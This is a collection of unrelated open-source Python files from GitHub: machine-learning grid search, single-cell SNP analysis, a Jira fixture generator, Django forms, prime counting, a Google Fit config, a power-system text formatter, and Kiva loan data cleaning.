+{"seq_id":"23227278716","text":"def grid_search_cv(x_train,y_train,gbrt,param_grid,cv=10,random_state=43,verbose=0):\n start = datetime.now()\n kinds = np.prod([len(i) for i in param_grid.values()])\n print('开始时间{}, 共计{}种'.format(start,kinds))\n \n grid_search = GridSearchCV(estimator=gbrt,param_grid=param_grid,cv=cv,verbose=verbose,return_train_score=True)\n grid_search.fit(x_train,y_train)\n \n end = datetime.now()\n seconds =(end - start).seconds\n print('grid_search_cv, 共计{}种,用时{}秒'.format(kinds,seconds))\n \n return grid_search.cv_results_,grid_search.best_params_\n","repo_name":"richzw/MachineLearningTips","sub_path":"sklearn/Grid_Search.py","file_name":"Grid_Search.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"26447760330","text":"import subprocess\nimport os\nimport warnings\n\nimport scanpy as sc\nimport pandas as pd\nimport pysam\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nfrom celescope.tools import utils\nfrom celescope.tools.step import Step\nfrom celescope.tools.step import s_common\nfrom celescope.tools.target_metrics import get_gene_list\nfrom celescope.__init__ import HELP_DICT\nfrom celescope.snp.__init__ import PANEL\n\n\nmatplotlib.use('Agg')\nwarnings.filterwarnings(\"ignore\")\n\nAA_DICT = {\n 'Gly' : 'G',\n 'Ala' : 'A',\n 'Val' : 'V',\n 'Leu' : 'L',\n 'Ile' : 'I',\n 'Phe' : 'F',\n 'Trp' : 'W',\n 'Tyr' : 'Y',\n 'Asp' : 'D',\n 'Asn' : 'N',\n 'Glu' : 'E',\n 'Lys' : 'K',\n 'Gln' : 'Q',\n 'Met' : 'M',\n 'Ser' : 'S',\n 'Thr' : 'T',\n 'Cys' : 'C',\n 'Pro' : 'P',\n 'His' : 'H',\n 'Arg' : 'R',\n}\n\n\ndef parse_variant_ann(variant_ann_file):\n \"\"\"\n Args:\n variant_ann_file: variant annotation file from snpEff.\n \n Returns:\n gene_list, mRNA_list, protein_list\n \"\"\"\n gene_list, mRNA_list, protein_list = [], [], []\n\n with open(variant_ann_file) as f:\n for line in f.readlines():\n if not line.startswith(\"#\"):\n info = line.split('\\t')[7]\n anns = info.split(\"|\")\n gene = anns[3]\n gene_list.append(gene)\n \n tmp1, tmp2 = [], []\n for ann in anns:\n if ann.startswith(\"c.\"):\n exon_loc = anns[anns.index(ann) - 1].split('/')[0]\n # WARNING_TRANSCRIPT_INCOMPLETE\n if not exon_loc:\n continue\n \n exon = ann.strip(\"c.\")\n exon = f\"exon{exon_loc}:{exon}\"\n if exon not in tmp1:\n tmp1.append(exon)\n\n if ann.startswith(\"p.\"):\n protein = ann[2:]\n for i in AA_DICT:\n protein = protein.replace(i, AA_DICT[i])\n if protein not in tmp2:\n tmp2.append(protein)\n \n mRNA_list.append(','.join(tmp1))\n protein_list.append(','.join(tmp2))\n\n return (gene_list, mRNA_list, protein_list)\n\n\ndef parse_vcf_to_df(vcf_file, cols=('chrom', 'pos', 'alleles'), infos=('VID', 'CID')):\n \"\"\"\n Read cols and infos into pandas df\n \"\"\"\n vcf = pysam.VariantFile(vcf_file)\n df = pd.DataFrame(columns=[col.capitalize() for col in cols] + infos)\n rec_dict = {}\n for rec in vcf.fetch():\n\n for col in cols:\n rec_dict[col.capitalize()] = getattr(rec, col)\n if col == 'alleles':\n rec_dict['Alleles'] = '-'.join(rec_dict['Alleles'])\n\n for info in infos:\n rec_dict[info] = rec.info[info]\n\n '''\n rec_dict['GT'] = [s['GT'] for s in rec.samples.values()][0]\n rec_dict['GT'] = [str(item) for item in rec_dict['GT']]\n rec_dict['GT'] = '/'.join(rec_dict['GT'])\n '''\n df_new = pd.DataFrame(rec_dict, index=[0])\n df = pd.concat([df, df_new])\n\n vcf.close()\n df.reset_index(drop=True, inplace=True)\n return df\n\n\ndef vcf_to_gt_csv(vcf_file, csv_file):\n vcf = pysam.VariantFile(vcf_file)\n \n samples = vcf.header.samples\n \n with open(csv_file, 'w') as f:\n header = ['variant'] + list(samples)\n f.write(','.join(header) + '\\n')\n \n for record in vcf:\n mutation_name = f\"{record.chrom}_{record.pos}\"\n genotypes = []\n \n for sample in samples:\n genotype = record.samples[sample]['GT']\n g1, g2 = genotype\n \n if g1 is None:\n genotype_str = \"NA\"\n else:\n genotype_str = '/'.join([str(g1),str(g2)])\n \n genotypes.append(genotype_str)\n \n line = [mutation_name] + genotypes\n f.write(','.join(line) + '\\n')\n\n\nclass Analysis_snp(Step):\n \"\"\"\n ## Features\n - Annotate variants with [snpEff](http://pcingola.github.io/SnpEff/).\n\n ## Output\n - `{sample}_gt.csv` Genotypes of variants of each cell. Rows are variants and columns are cells.\n - `{sample}_variant_ncell.csv` Number of cells with each genotype.\n - `{sample}_variant_table.csv` annotated with snpEff.\n\n \"\"\"\n\n def __init__(self, args, display_title=None):\n super().__init__(args, display_title)\n self.vcf_file = args.vcf\n\n # parse\n self.gene_list, self.n_gene = get_gene_list(args)\n self.database = args.database\n\n # data\n self.variant_table = None\n\n # out\n self.snpeff_outdir = f'{self.outdir}/snpEff/'\n self.snpeff_ann_vcf_file = f'{self.snpeff_outdir}/variants_ann.vcf'\n self.final_vcf_file = f'{self.out_prefix}_final.vcf'\n utils.check_mkdir(self.snpeff_outdir)\n self.plot_snp_dir = f'{self.outdir}/{self.sample}_plot_snp/'\n\n self.gt_file = f'{self.out_prefix}_gt.csv'\n self.ncell_file = f'{self.out_prefix}_variant_ncell.csv'\n self.variant_table_file = f'{self.out_prefix}_variant_table.csv'\n\n @utils.add_log\n def write_gt(self):\n vcf_to_gt_csv(self.final_vcf_file, self.gt_file)\n\n @utils.add_log\n def write_ncell(self):\n \"\"\"\n parse gt_file to collect each genotype cell count into ncell_file\n \"\"\"\n df = pd.read_csv(self.gt_file, index_col=0)\n df_ncell = df.apply(pd.Series.value_counts, axis=1).fillna(0).astype(int)\n df_ncell.to_csv(self.ncell_file, index=True)\n\n @utils.add_log\n def run_snpEff(self):\n cmd = (\n f\"snpEff -Xmx8g -v {self.database} {os.path.abspath(self.vcf_file)} > variants_ann.vcf \"\n )\n self.run_snpEff.logger.info(cmd)\n\n cwd = os.getcwd()\n os.chdir(self.snpeff_outdir)\n subprocess.check_call(cmd, shell=True)\n # change dir back to avoid can not find '09.analysis_snp/stat.txt' error\n os.chdir(cwd)\n\n @utils.add_log\n def keep_in_gene(self):\n \"\"\"\n Output:\n self.final_vcf_file\n \"\"\"\n gene_list, _, _ = parse_variant_ann(self.snpeff_ann_vcf_file)\n with pysam.VariantFile(self.snpeff_ann_vcf_file) as vcf_in:\n with pysam.VariantFile(self.final_vcf_file, 'w', header=vcf_in.header) as vcf_out:\n for i, record in enumerate(vcf_in.fetch()):\n if gene_list[i] in self.gene_list:\n vcf_out.write(record) \n\n\n def get_variant_table(self):\n \"\"\"\n Returns:\n is_in_gene_list: if res[i] == True, line i is in gene_list\n \"\"\"\n\n df_vcf = parse_vcf_to_df(self.final_vcf_file, infos=[])\n df_vcf[\"Gene\"], df_vcf[\"mRNA\"], df_vcf[\"Protein\"] = parse_variant_ann(self.final_vcf_file)\n df_ncell = pd.read_csv(self.ncell_file)\n df_vcf = pd.concat([df_vcf, df_ncell], axis=1)\n\n cols = [\"Chrom\", \"Pos\", \"Alleles\", \"Gene\", \"0/0\", \"0/1\", \"1/1\", \"mRNA\", \"Protein\"]\n cols = [col for col in cols if col in df_vcf.columns]\n df_vcf = df_vcf.loc[:, cols]\n is_in_gene_list = df_vcf.Gene.isin(self.gene_list)\n df_vcf = df_vcf[is_in_gene_list]\n\n self.variant_table = df_vcf\n self.variant_table.reset_index(drop=True, inplace=True)\n self.variant_table.to_csv(self.variant_table_file, index=False)\n\n def add_help(self):\n '''\n
Chrom : chromosome name.
\n
Pos : the 1-based position of the variation on the given sequence..
\n
Alleles : REF(reference base or bases in the case of an indel) - ALT(alternative alleles).
\n
0/0, 0/1, 1/1: number of cells with each genotype.
\n
Gene : gene symbol.
\n
mRNA : A standard nomenclature is used in specifying the sequence changes.
\n
Protein : A standard nomenclature is used in specifying the sequence changes.
\n '''\n self.add_help_content(\n name='Chrom',\n content='Chromosome name'\n )\n self.add_help_content(\n name='Pos',\n content='the 1-based position of the variation on the given sequence'\n )\n self.add_help_content(\n name='Alleles',\n content='REF(reference base or bases in the case of an indel) - ALT(alternative alleles)'\n )\n self.add_help_content(\n name='0/0, 0/1, 1/1',\n content='number of cells with each genotype'\n )\n self.add_help_content(\n name='Gene',\n content='gene symbol'\n )\n self.add_help_content(\n name='mRNA',\n content='A standard nomenclature is used in specifying the sequence changes'\n )\n self.add_help_content(\n name='Protein',\n content='A standard nomenclature is used in specifying the sequence changes'\n )\n\n @utils.add_log\n def plot_snp(self):\n match_dict = utils.parse_match_dir(self.args.match_dir)\n if 'h5ad' not in match_dict:\n return\n\n utils.check_mkdir(self.plot_snp_dir)\n df_gt = pd.read_csv(self.gt_file, keep_default_na=False, index_col=0)\n df_v = self.variant_table.copy()\n df_v['n_variants'] = df_v['0/1'] + df_v['1/1']\n indices = df_v.nlargest(self.args.plot_top_n, 'n_variants').index\n df_top = df_gt.iloc[indices,]\n df_top = df_top.transpose()\n variants = df_top.columns\n for c in variants:\n df_top[c] = df_top[c].astype('category')\n\n adata = sc.read_h5ad(match_dict['h5ad'])\n adata.obs = pd.concat([adata.obs, df_top], axis=1)\n pt_size = min(100, 120000 / len(adata.obs))\n gene_list, protein_list = df_v['Gene'], df_v['Protein']\n for i, v in enumerate(variants):\n title = f'top{i+1}_{variants[i]}_{gene_list[indices[i]]}_{protein_list[indices[i]]}'\n file_name = f'{self.plot_snp_dir}/{title}.pdf'\n sc.pl.umap(adata, color=v, size=pt_size, \n palette={'0/0':'dimgray', '0/1':'orange', '1/1':'red','NA':'lightgray'},\n title=title)\n plt.savefig(file_name,dpi=300,bbox_inches=\"tight\")\n\n\n\n def run(self):\n self.run_snpEff()\n self.keep_in_gene()\n self.write_gt()\n self.write_ncell()\n self.get_variant_table()\n self.add_help()\n self.plot_snp()\n table_dict = self.get_table_dict(title='Variant table', table_id='variant', df_table=self.variant_table)\n self.add_data(table_dict=table_dict)\n\n\n@utils.add_log\ndef analysis_snp(args):\n with Analysis_snp(args, display_title='Analysis') as runner:\n runner.run()\n\n\ndef get_opts_analysis_snp(parser, sub_program):\n parser.add_argument(\"--gene_list\", help=HELP_DICT['gene_list'])\n parser.add_argument(\"--database\", help='snpEff database. Common choices are GRCh38.mane.1.0.ensembl(human) and GRCm38.99(mouse)', default='GRCh38.mane.1.0.ensembl')\n parser.add_argument(\"--panel\", help=HELP_DICT['panel'], choices=list(PANEL))\n parser.add_argument(\"--plot_top_n\", type=int, help='plot UMAP of at most n variants ', default=20)\n if sub_program:\n s_common(parser)\n parser.add_argument('--match_dir', help=HELP_DICT['match_dir'], required=True)\n parser.add_argument('--vcf', help='vcf file.', required=True)\n","repo_name":"singleron-RD/CeleScope","sub_path":"celescope/snp/analysis_snp.py","file_name":"analysis_snp.py","file_ext":"py","file_size_in_byte":11606,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"18"}
+{"seq_id":"25651205431","text":"import json\nimport pathlib\nfrom base64 import b64encode\nfrom typing import Any, List, Mapping\n\nfrom airbyte_cdk.sources.streams.http.auth import TokenAuthenticator\nfrom streams import (\n DashboardsGenerator,\n FiltersGenerator,\n FilterSharingGenerator,\n GroupsGenerator,\n IssueCommentsGenerator,\n IssueFieldsGenerator,\n IssueRemoteLinksGenerator,\n IssuesGenerator,\n IssueVotesGenerator,\n IssueWatchersGenerator,\n ProjectCategoriesGenerator,\n ProjectComponentsGenerator,\n ProjectsGenerator,\n ProjectVersionsGenerator,\n ScreensGenerator,\n UsersGenerator,\n WorkflowSchemesGenerator,\n WorkflowsGenerator,\n)\n\n\nclass Generator:\n base_config_path = \"secrets/config.json\"\n\n def __init__(self):\n self.configs = None\n super(Generator, self).__init__()\n\n def _get_configs(self):\n if not self.configs:\n source_directory = pathlib.Path(__file__).resolve().parent.parent.parent.parent\n configs_path = source_directory.joinpath(self.base_config_path)\n with open(configs_path) as json_configs:\n self.configs = json.load(json_configs)\n return self.configs\n\n @staticmethod\n def _get_authenticator(config: Mapping[str, Any]):\n token = b64encode(bytes(config[\"email\"] + \":\" + config[\"api_token\"], \"utf-8\")).decode(\"ascii\")\n authenticator = TokenAuthenticator(token, auth_method=\"Basic\")\n return authenticator\n\n def streams(self) -> List:\n config = self._get_configs()\n authenticator = self._get_authenticator(config)\n args = {\"authenticator\": authenticator, \"domain\": config[\"domain\"]}\n return [\n DashboardsGenerator(**args),\n FiltersGenerator(**args),\n FilterSharingGenerator(**args),\n GroupsGenerator(**args),\n IssuesGenerator(**args),\n IssueCommentsGenerator(**args),\n IssueFieldsGenerator(**args),\n IssueRemoteLinksGenerator(**args),\n IssueVotesGenerator(**args),\n IssueWatchersGenerator(**args),\n ProjectsGenerator(**args),\n ProjectCategoriesGenerator(**args),\n ProjectComponentsGenerator(**args),\n ProjectVersionsGenerator(**args),\n ScreensGenerator(**args),\n UsersGenerator(**args),\n WorkflowsGenerator(**args),\n WorkflowSchemesGenerator(**args),\n ]\n\n def run(self):\n for stream in self.streams():\n stream.generate()\n\n\nif __name__ == \"__main__\":\n generator = Generator()\n generator.run()\n","repo_name":"datasphere-oss/datasphere-databyte","sub_path":"airbyte-integrations/connectors/source-jira/integration_tests/fixtures/data_generator/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"11134001730","text":"from django.contrib.auth.forms import AuthenticationForm, UserChangeForm\nfrom .models import EPS, CustomUser, TipoUsuario, InfoMiembros, TipoDocumento, EstadoCivil, RegimenSeguridad, Sexo, Etnia\nfrom django import forms\nfrom django.utils.html import format_html\n\n\nclass FiltroUsuarios(forms.Form):\n nombre = forms.CharField(\n required=False,\n widget=forms.TextInput(attrs={'class': 'form-control'})\n )\n id_usuario = forms.IntegerField(\n required=False,\n widget=forms.NumberInput(attrs={'class': 'form-control'})\n )\n documento_usuario = forms.CharField(\n max_length=20,\n required=False,\n widget=forms.TextInput(attrs={'class': 'form-control'})\n )\n\nclass FiltroPacientes(forms.Form):\n nombre = forms.CharField(\n required=False,\n widget=forms.TextInput(attrs={'class': 'form-control'})\n )\n documento_paciente = forms.CharField(\n max_length=20,\n required=False,\n widget=forms.TextInput(attrs={'class': 'form-control'})\n )\n\n \n \n\nclass FiltroLlamadasForm(forms.Form):\n id_llamada = forms.IntegerField(\n required=False,\n widget=forms.NumberInput(attrs={'class': 'form-control'})\n )\n \n id_profesional = forms.IntegerField(\n required=False,\n widget=forms.NumberInput(attrs={'class': 'form-control '})\n )\n \n documento_paciente = forms.CharField(\n max_length=20,\n required=False,\n widget=forms.TextInput(attrs={'class': 'form-control'})\n )\n \n fecha_llamada = forms.DateField(\n required=False,\n widget=forms.DateInput(attrs={'type': 'date', 'class': 'form-control'})\n )\n \n solo_hechas_por_mi = forms.BooleanField(\n required=False,\n widget=forms.CheckboxInput(attrs={'class': 'form-check-input'})\n )\n\nclass FiltroCitasForm(forms.Form):\n id_cita = forms.IntegerField(\n required=False,\n widget=forms.NumberInput(attrs={'class': 'form-control'})\n )\n \n id_profesional = forms.IntegerField(\n required=False,\n widget=forms.NumberInput(attrs={'class': 'form-control '})\n )\n documento_paciente = forms.CharField(\n max_length=20,\n required=False,\n widget=forms.TextInput(attrs={'class': 'form-control'})\n )\n fecha_cita = forms.DateField(\n required=False,\n widget=forms.DateInput(attrs={'type': 'date', 'class': 'form-control'})\n )\n solo_hechas_por_mi = forms.BooleanField(\n required=False,\n widget=forms.CheckboxInput(attrs={'class': 'form-check-input'})\n )\n\nclass CustomUserRegistrationForm(forms.ModelForm):\n username = forms.CharField(\n label='Nombre de usuario',\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Nombre de usuario'})\n )\n email = forms.EmailField(\n label='Correo electrónico',\n widget=forms.EmailInput(attrs={'class': 'form-control', 'placeholder': 'Correo electrónico'})\n )\n password = forms.CharField(\n label='Contraseña',\n widget=forms.PasswordInput(attrs={'class': 'form-control', 'placeholder': 'Contraseña'})\n )\n password2 = forms.CharField(\n label='Confirmar contraseña',\n widget=forms.PasswordInput(attrs={'class': 'form-control', 'placeholder': 'Confirmar contraseña'})\n )\n tipo_usuario = forms.ModelChoiceField(\n label='Seleccione tipo de usuario',\n queryset=TipoUsuario.objects.all(),\n widget=forms.Select(attrs={'class': 'custom-class form-select', 'id': 'custom-id'}),\n empty_label='Selecciona un tipo de usuario'\n )\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['password2'].label = 'Confirmar contraseña'\n\n class Meta:\n model = CustomUser\n fields = ('username', 'email', 'password', 'password2', 'tipo_usuario')\n\n\n\nclass AutodataForm(forms.ModelForm):\n tipo_documento = forms.ModelChoiceField(\n queryset=TipoDocumento.objects.all(),\n widget=forms.Select(attrs={\n 'class': 'form-select',\n 'id': 'id_tipo_documento'\n }),\n empty_label=\"Selecciona tu tipo de documento\"\n )\n estado_civil = forms.ModelChoiceField(\n queryset=EstadoCivil.objects.all(),\n widget=forms.Select(attrs={\n 'class': 'form-select',\n 'id': 'id_estado_civil'\n }),\n empty_label=\"Selecciona tu estado civil\"\n )\n regimen_seguridad = forms.ModelChoiceField(\n queryset=RegimenSeguridad.objects.all(),\n widget=forms.Select(attrs={\n 'class': 'form-select',\n 'id': 'id_regimen_seguridad'\n }),\n empty_label=\"Selecciona tu régimen de seguridad\"\n )\n sexo = forms.ModelChoiceField(\n queryset=Sexo.objects.all(),\n widget=forms.Select(attrs={\n 'class': 'form-select',\n 'id': 'id_sexo'\n }),\n empty_label=\"Selecciona tu sexo\"\n )\n etnia = forms.ModelChoiceField(\n queryset=Etnia.objects.all(),\n widget=forms.Select(attrs={\n 'class': 'form-select',\n 'id': 'id_etnia'\n }),\n empty_label=\"Selecciona tu Etnia\"\n )\n eps = forms.ModelChoiceField(\n queryset=EPS.objects.all(),\n widget=forms.Select(attrs={'class': 'form-select', 'id': 'id_nombre_eps'})\n )\n\n # Agregar campos restantes con estilos Bootstrap\n nombre = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'id': 'id_nombre'}))\n documento = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'id': 'id_documento'}))\n numero_hijos = forms.IntegerField(widget=forms.NumberInput(attrs={'class': 'form-control', 'id': 'id_numero_hijos'}))\n direccion = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'id': 'id_direccion'}))\n barrio = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'id': 'id_barrio'}))\n celular = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'id': 'id_celular'}))\n sisben = forms.BooleanField(widget=forms.CheckboxInput(attrs={'class': 'form-check-input', 'id':'sisben'}),\n required=False)\n class Meta:\n model = InfoMiembros\n fields = ('nombre', 'tipo_documento', 'documento', 'estado_civil', 'numero_hijos', 'etnia',\n 'direccion', 'barrio', 'celular', 'sisben', 'eps', 'regimen_seguridad', 'sexo',)\n\n\nclass CustomUserLoginForm(AuthenticationForm):\n username = forms.CharField(\n widget=forms.TextInput(attrs={'class': 'form-control'}))\n password = forms.CharField(\n widget=forms.PasswordInput(attrs={'class': 'form-control'}))\n\n","repo_name":"DavidMojicaDev/T3","sub_path":"main/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":6745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"9707497421","text":"# !usr/bin/env python3\r\n\r\n\"\"\"Counts the number of primes from 2 to a user-specified limit.\r\nA number is considered prime if it is greater than or equal to 2,\r\nand its only factors are 1 and itself.\r\n\"\"\"\r\n\r\nimport cProfile\r\nimport pstats\r\nfrom math import isqrt\r\n\r\n\r\ndef count_primes(limit: int) -> int:\r\n \"\"\"Returns the number of primes from 2 to the limit specified.\"\"\"\r\n primes = set(range(3, limit + 1, 2))\r\n for i in range(3, isqrt(limit) + 1, 2):\r\n if i in primes:\r\n primes.difference_update(range(i ** 2, limit + 1, i))\r\n return len(primes) + 1\r\n\r\n\r\ndef main(n: int = 100_000) -> None:\r\n with cProfile.Profile() as pr:\r\n print(count_primes(n))\r\n pr.print_stats(pstats.SortKey.TIME)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main(250_000)\r\n","repo_name":"siddsp02/Prime-Counter","sub_path":"primes.py","file_name":"primes.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"31239419502","text":"#!/usr/bin/python\nimport os\nimport uuid\n\nDEBUG = True\nGOOGLE_OAUTH2_CLIENT_ID = os.environ.get('GOOGLE_OAUTH2_CLIENT_ID', 'not found')\nAUTH_URI = os.environ.get('AUTH_URI', 'not found')\nTOKEN_URI = os.environ.get('TOKEN_URI', 'not found')\nGOOGLE_OAUTH2_CLIENT_SECRET = os.environ.get('GOOGLE_OAUTH2_CLIENT_SECRET', 'not found')\nREDIRECT_URIS = os.environ.get('REDIRECT_URIS', 'not found')\nJAVASCRIPT_ORIGINS = os.environ.get('JAVASCRIPT_ORIGINS', 'not found')\nAPPLICATION_NAME = os.environ.get('APP_NAME', 'refit')\nUSERNAME = os.environ.get('USERNAME', 'admin')\nPASSWORD = os.environ.get('PASSWORD', 'admin')\nSECRET_KEY = os.environ.get('SECRET_KEY', str(uuid.uuid4()))\nHOST = os.environ.get('HOST', '0.0.0.0')\nPORT = int(os.environ.get('PORT', 5000))\nGOOGLE_FIT_SCOPES = ['https://www.googleapis.com/auth/fitness.body.read',\n 'https://www.googleapis.com/auth/fitness.activity.read', 'https://www.googleapis.com/auth/fitness.activity.read', 'https://www.googleapis.com/auth/drive.metadata.readonly']\nDATA_SOURCE_ID_CAL1 = 'derived:com.google.calories.bmr:com.google.android.gms:from_height&weight'\nDATA_SOURCE_ID_CAL2 = 'derived:com.google.calories.bmr:com.google.android.gms:merged'\nDATA_SOURCE_ID_STEPS = 'derived:com.google.step_count.delta:com.google.android.gms:estimated_steps'\nDATA_SOURCE_ID_WEIGHT_USER_INPUT = 'raw:com.google.height:com.google.android.apps.fitness:user_input'\nDATA_SOURCE_ID_HR = 'derived:com.google.heart_rate.bpm:com.google.android.gms:merge_heart_rate_bpm'\nDATA_SOURCE_ID_SLEEP = 'raw:com.google.activity.segment:com.mc.miband1:'\nDATA_SOURCE_ID_WEIGHT_MERGE = 'derived:com.google.weight:com.google.android.gms:merge_weight'\n","repo_name":"cnheider/refit","sub_path":"refit/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"30955038084","text":"\"\"\"\nOutput TXT file formatter.\n\"\"\"\n\nimport os\nfrom typing import Iterable\n\nfrom andes.shared import np\n\n\ndef dump_data(text, header, rowname, data, file, width=18, precision=5):\n out = ''\n\n os.makedirs(os.path.abspath(os.path.dirname(file)), exist_ok=True)\n with open(file, 'w') as fid:\n\n for Text, Header, Rowname, Data in zip(text, header, rowname, data):\n # Write Text\n if Text:\n fid.writelines(Text)\n\n # determine the width for the first column (usually names)\n width_first = width\n if isinstance(Rowname, Iterable) and len(Rowname) > 0:\n for item in Rowname:\n if isinstance(item, Iterable) and len(item) > width_first:\n width_first = len(item)\n\n # Write Header\n if Header:\n ncol = len(Header)\n s = ' ' * width_first\n s += '{:>{width}s}' * ncol + '\\n'\n fid.writelines(s.format(*Header, width=width))\n fid.write('\\n')\n\n # Append Rowname to Data\n # Data is a list of column lists\n if Rowname is not None:\n ncol = 0\n for idx, item in enumerate(Rowname): # write by row as always\n if Data is None:\n out = ''\n elif isinstance(Data, (int, float, str)):\n out = [Data]\n elif isinstance(Data, (list, tuple, np.ndarray)):\n if isinstance(Data[0], (int, float)): # is a list of numbers\n out = [Data[idx]]\n elif isinstance(Data[0], (list, np.ndarray)): # list of list in Data\n ncol = len(Data)\n out = [Data[i][idx] for i in range(ncol)]\n else:\n print(Data)\n print('Unexpected Data during output, in formats/txt.py')\n\n s = '{:{width_first}s}' # for row header\n for ii, col in enumerate(out):\n if isinstance(col, (int, float)):\n s += '{:>{width}.{precision}g}'\n elif isinstance(col, str):\n if len(col) > width:\n out[ii] = col[:width]\n s += '{:>{width}s}'\n elif col is None:\n out[ii] = 'None'\n s += '{:>{width}s}'\n else:\n pass\n s += '\\n'\n\n fid.write(\n s.format(\n str(item), *out, width_first=width_first, width=width, precision=precision))\n fid.write('\\n')\n","repo_name":"CURENT/andes","sub_path":"andes/io/txt.py","file_name":"txt.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","stars":178,"dataset":"github-code","pt":"18"}
+{"seq_id":"2543922516","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu May 24 12:08:16 2018\r\n\r\n@author: Sandman\r\n\"\"\"\r\n\r\n# kiva_loans.csv file contains comma (,) in the column field value due to this Pyspark CSV reader package is unable to read data correctly\r\n\r\n# Thus, first load the data using the python pandas library and select the appropriate columns, handle the missing values and create new Spark data from Pandas dataframe\r\n\r\n# Operations are as below\r\n# Input File\r\n#kiva_loans.csv -- (id,funded_amount,loan_amount,activity,sector,use,country_code,country,region,currency,partner_id,posted_time,disbursed_time,funded_time,term_in_months,lender_count,tags,borrower_genders,repayment_interval,date)\r\n\r\n# output File in gunzip format\r\n# /user/sahilbhange/output/kiva/formated_output/part-00000.gz\r\n#(id,funded_amount,loan_amount,activity,sector,country,region,currency,partner_id,posted_time,disbursed_time,term_in_months,lender_count,borrower_genders,repayment_interval,date)\r\n\r\n# Spark parameter setting for execution\r\n\r\n# spark-submit --master yarn --conf spark.ui.port=12789 --num-executors 6 --executor-cores 3 --executor-memory 1G src/main/python/kiva_code/kiva_loans_data_preprocessing.py\r\n\r\n\r\nimport pandas as pd\r\nfrom pyspark import SparkConf, SparkContext\r\nfrom pyspark.sql import SQLContext\r\n#from pyspark.sql import *\r\n#from pyspark.sql.functions import *\r\n\r\nconf=SparkConf().setAppName(\"kiva-loan-file-cleaning\").setMaster(\"yarn-client\")\r\n\r\nsc = SparkContext(conf=conf)\r\n\r\nsqlContext = SQLContext(sc)\r\n\r\n# load csv file data using pandas\r\nkiva_loan_pdf=pd.read_csv(\"/home/sahilbhange/kiva_loan_data/kiva_loans.csv\", encoding='utf-8',delimiter=',')\r\n\r\n''' \r\n#pandas data pre-processing\r\n#Null values in borrower_genders column\r\n#>>> kiva_loan_pdf['borrower_genders'].isnull().sum()\r\n#4221\r\n\r\n#There are 4221 records with NULL value for field 'borrower_genders'\r\n#Thus default NULL value as \"NotAvailable\"\r\n'''\r\n\r\nkiva_loan_pdf['borrower_genders']=kiva_loan_pdf['borrower_genders'].fillna(\"NotAvailable\")\r\n'''\r\n# normalize the values in borrower_genders columns as below\r\n# male - male\r\n# female - female\r\n# if male and female - group \r\n'''\r\nkiva_loan_pdf['borrower_genders']=[elem if elem in ['female','male'] else 'group' for elem in kiva_loan_pdf['borrower_genders'] ]\r\n\r\n'''\r\n# There are 2396 records with NULL value for field 'disbursed_time'\r\n# thus default missing disbursed_time with '1900-01-01 00:00:00+00:00'\r\n# We can filter out default value records while querying the data\r\n#>>> kiva_loan_pdf['disbursed_time'].isnull().sum()\r\n#2396\r\n# Default the missing values for disbursed_time with '1900-01-01 00:00:00+00:00'\r\n'''\r\n\r\nkiva_loan_pdf['disbursed_time']=kiva_loan_pdf['disbursed_time'].fillna(\"1900-01-01 00:00:00+00:00\")\r\n\r\n'''\r\n#>>> kiva_loan_pdf['country_code'].isnull().sum()\r\n#8\r\n\r\n# 8 values for country_code field are NULL\r\n\r\n# Find the corresponding coutry for NULL country_code value\r\n#>>> kiva_loan_pdf[kiva_loan_pdf['country_code'].isnull()][['country','country_code']]\r\n# country country_code\r\n#202537 Namibia NaN\r\n\r\n# Country Namibia has null values for country field\r\n# Fill Namibia coutry code value as 'NA'\r\n'''\r\n\r\nkiva_loan_pdf['country_code']=kiva_loan_pdf['country_code'].fillna(\"NA\")\r\n\r\n# Select only required fields and create new pandas data frame\r\n# Exclude the country code in new file as coutry and coutry code give same information\r\nkivaLoan_req_fields = kiva_loan_pdf[['id','funded_amount','loan_amount','activity','sector','country','currency','partner_id','posted_time','disbursed_time','term_in_months','lender_count','borrower_genders','repayment_interval','date']]\r\n\r\nsqlc=SQLContext(sc)\r\n\r\n# Convert Pandas dataframe to Spark data frame\r\nkivaLoan_SDF=sqlc.createDataFrame(kivaLoan_req_fields)\r\n\r\n\r\n# Save the Spark data frame with the required fields to HDFS in gunzip format\r\n# Save in overwrite mode in case of rerun\r\nkivaLoan_SDF.repartition(1).write.format('com.databricks.spark.csv').option(\"codec\", \"org.apache.hadoop.io.compress.GzipCodec\").save('/user/sahilbhange/output/kiva/formated_output/',header = 'true',mode='overwrite')\r\n\r\n\r\n","repo_name":"sahilbhange/Kiva-Loan-Data-Warehouse","sub_path":"kiva_datapreprocessing/kiva_loans_data_preprocessing.py","file_name":"kiva_loans_data_preprocessing.py","file_ext":"py","file_size_in_byte":4101,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
